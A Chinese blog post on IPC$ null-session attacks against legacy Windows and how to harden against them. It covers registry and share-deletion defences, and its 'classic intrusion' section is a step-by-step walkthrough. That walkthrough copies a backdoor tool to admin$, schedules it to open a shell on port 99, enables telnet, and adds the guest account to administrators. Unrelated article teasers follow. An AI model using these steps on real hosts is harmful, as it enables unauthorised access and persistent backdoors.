空連線IPC 攻擊與防範

2021-08-26 10:44:47 字數 4586 閱讀 5771

【ipc$與空連線,139,445埠,預設共享的關係 】

1)ipc$與空連線:

不需要使用者名稱與密碼的ipc$連線即為空連線,一旦你以某個使用者或管理員的身份登陸(即以特定的使用者名稱和密碼進行ipc$連線),自然就不能叫做空連線了。

許多人可能要問了,既然可以空連線,那我以後就空連線好了,為什麼還要費九牛二虎之力去掃瞄弱口令,呵呵,原因前面提到過,當你以空連線登陸時,你沒有任何許可權(很鬱悶吧),而你以使用者或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲)。

2)ipc$與139,445埠:

ipc$連線可以實現遠端登陸及對預設共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享檔案/印表機的訪問,因此一般來講,ipc$連線是需要139或445埠來支援的。

3)ipc$與預設共享

預設共享是為了方便管理員遠端管理而預設開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$......)和系統目錄winnt或windows(admin$),我們通過ipc$連線可以實現對這些預設共享的訪問(前提是對方沒有關閉這些預設共享)

【ipc$連線失敗的原因 】

以下5個原因是比較常見的:

1)你的系統不是nt或以上作業系統;

2)對方沒有開啟ipc$預設共享

3)對方未開啟139或445埠(惑被防火牆遮蔽)

4)你的命令輸入有誤(比如缺少了空格等)

5)使用者名稱或密碼錯誤(空連線當然無所謂了)

另外,你也可以根據返回的錯誤號分析原因:

錯誤號5,拒絕訪問 : 很可能你使用的使用者不是管理員許可權的,先提公升許可權;

錯誤號51,windows 無法找到網路路徑 : 網路有問題;

錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;

錯誤號1219,提供的憑據與已存在的憑據集衝突 : 你已經和對方建立了乙個ipc$,請刪除再連。

錯誤號1326,未知的使用者名稱或錯誤密碼 : 原因很明顯了;

錯誤號1792,試圖登入,但是網路登入服務沒有啟動 : 目標netlogon服務未啟動。(連線域控會出現此情況)

錯誤號2242,此使用者的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。

關於ipc$連不上的問題比較複雜,除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細而確定的說明,就*大家自己體會和試驗了。

首先你需要獲得乙個不依賴於ipc$的shell,比如sql的cmd擴充套件、telnet、木馬,當然,這shell必須是admin許可權的,然後你可以使用shell執行命令 net share ipc$ 來開放目標的ipc$。從上面可以知道,ipc$能否使用還有很多條件。請確認相關服務都已執行,沒有就啟動它(不知道怎麼做的請看net命令的用法),還是不行的話(比如有防火牆,殺不了)建議放棄。

【如何防範ipc$入侵 】

1、禁止空連線進行列舉(此操作並不能阻止空連線的建立,引自《解剖win2000下的空會話》)

首先執行regedit,找到如下組建[hkey_local_machine\system\currentcontrolset\control\lsa]把restrictanonymous = dword的鍵值改為:00000001(如果設定為2的話,有一些問題會發生,比如一些win的服務出現問題等等)

2、禁止預設共享

1)察看本地共享資源

執行-cmd-輸入net share

2)刪除共享(每次輸入乙個)

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete(如果有e,f,......可以繼續刪除)

3)停止server服務

net stop server /y (重新啟動後server服務會重新開啟)

4)修改登錄檔

執行-regedit

server版:找到如下主鍵[hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters]把autoshareserver(dword)的鍵值改為:00000000。

pro版:找到如下主鍵[hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters]把autosharewks(dword)的鍵值改為:00000000。

如果上面所說的主鍵不存在,就新建(右擊-新建-雙位元組值)乙個主健再改鍵值。

3、永久關閉ipc$和預設共享依賴的服務:lanmanserver即server服務

控制面板-管理工具-服務-找到server服務(右擊)-屬性-常規-啟動型別-已禁用

4、安裝防火牆(選中相關設定),或者埠過濾(濾掉139,445等),或者用新版本的優化大師

5、設定複雜密碼,防止通過ipc$窮舉密碼

【相關命令】

1)建立空連線:

net use \\ip\ipc$ "" /user:""(一定要注意:這一行命令中包含了3個空格)

2)建立非空連線:

net use \\ip\ipc$ "使用者名稱" /user:"密碼" (同樣有3個空格)

3)對映預設共享:

net use z: \\ip\c$ "密碼" /user:"使用者名稱" (即可將對方的c盤對映為自己的z盤,其他盤類推)

如果已經和目標建立了ipc$,則可以直接用ip+碟符+$訪問,具體命令 net use z: \\ip\c$

4)刪除乙個ipc$連線

net use \\ip\ipc$ /del

5)刪除共享對映

net use c: /del 刪除對映的c盤,其他盤類推

net use * /del 刪除全部,會有提示要求按y確認

【經典入侵模式】

這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)

1. c:\>net use \\127.0.0.1\ipc$ "" /user:"admintitrators"

這是用《流光》掃到的使用者名稱是administrators,密碼為"空"的ip位址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立乙個連線,因為密碼為"空",所以第乙個引號處就不用輸入,後面乙個雙引號裡的是使用者名稱,輸入administrators,命令即可成功完成。

2. c:\>copy srv.exe \\127.0.0.1\admin$

先複製srv.exe上去,在流光的tools目錄下就有(這裡的$是指admin使用者的c:\winnt\system32\,大家還可以使用c$、d$,意思是c盤與d盤,這看你要複製到什麼地方去了)。

3. c:\>net time \\127.0.0.1

查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。

4. c:\>at \\127.0.0.1 11:05 srv.exe

用at命令啟動srv.exe吧(這裡設定的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)

5. c:\>net time \\127.0.0.1

再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備開始下面的命令。

6. c:\>telnet 127.0.0.1 99

這裡會用到telnet命令吧,注意埠是99。telnet預設的是23埠,但是我們使用的是srv在對方計算機中為我們建立乙個99埠的shell。

雖然我們可以telnet上去了,但是srv是一次性的,下次登入還要再啟用!所以我們打算建立乙個telnet服務!這就要用到ntlm了

7.c:\>copy ntlm.exe \\127.0.0.1\admin$

用copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的tools目錄中)。

8. c:\winnt\system32>ntlm

輸入ntlm啟動(這裡的c:\winnt\system32>指的是對方計算機,執行ntlm其實是讓這個程式在對方計算機上執行)。當出現"done"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟telnet服務!

9. telnet 127.0.0.1,接著輸入使用者名稱與密碼就進入對方了,操作就像在dos上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)

為了以防萬一,我們再把guest啟用加到管理組

10. c:\>net user guest /active:yes

將對方的guest使用者啟用

11. c:\>net user guest 1234

將guest的密碼改為1234,或者你要設定的密碼

12. c:\>net localgroup administrators guest /add

將guest變為administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)

arp攻擊原理與防範

前段時間,終於狠下來給自己的手提換了個固態硬碟,那隨著而來的肯定是得裝個系統在那裡。反正要裝,就裝個新的來體驗一下吧,直接就裝了個win8.1的。win8.1的各種東西讓我折騰了好久,部分特徵讓我好糾結,不過介面還蠻不錯的。固態硬碟就是爽,飛一般的感覺,開啟vs一下子快多了,查閱文件,快多了。各種爽...

MAC位址攻擊原理與防範

一 交換機的原理 收到資料幀後,交換機的工作步驟 1 學習源mac位址並建立mac位址表 2 查詢mac位址表,若有目的mac位址,則單播 如果沒有,則廣播到所有介面。二 mac位址泛洪攻擊原理 交換機會將學習到的mac位址儲存在mac位址表裡,但是mac位址表大小有限,並且mac位址表上的位址有老...

HTTP攻擊與防範 PHP安全配置

1.了解php攻擊帶來的危險性。2.掌握php攻擊的原理與方法 3.掌握防範攻擊的方法 由於 伺服器是以單一系統使用者的模式在執行,因此這個系統的使用者賬號必須能夠讀取每個使用者的文件。這表示在 伺服器上執行的任何 文件都能夠訪問每個使用者的文件。php的安全模式在多使用者的系統上設定一些限制選項來...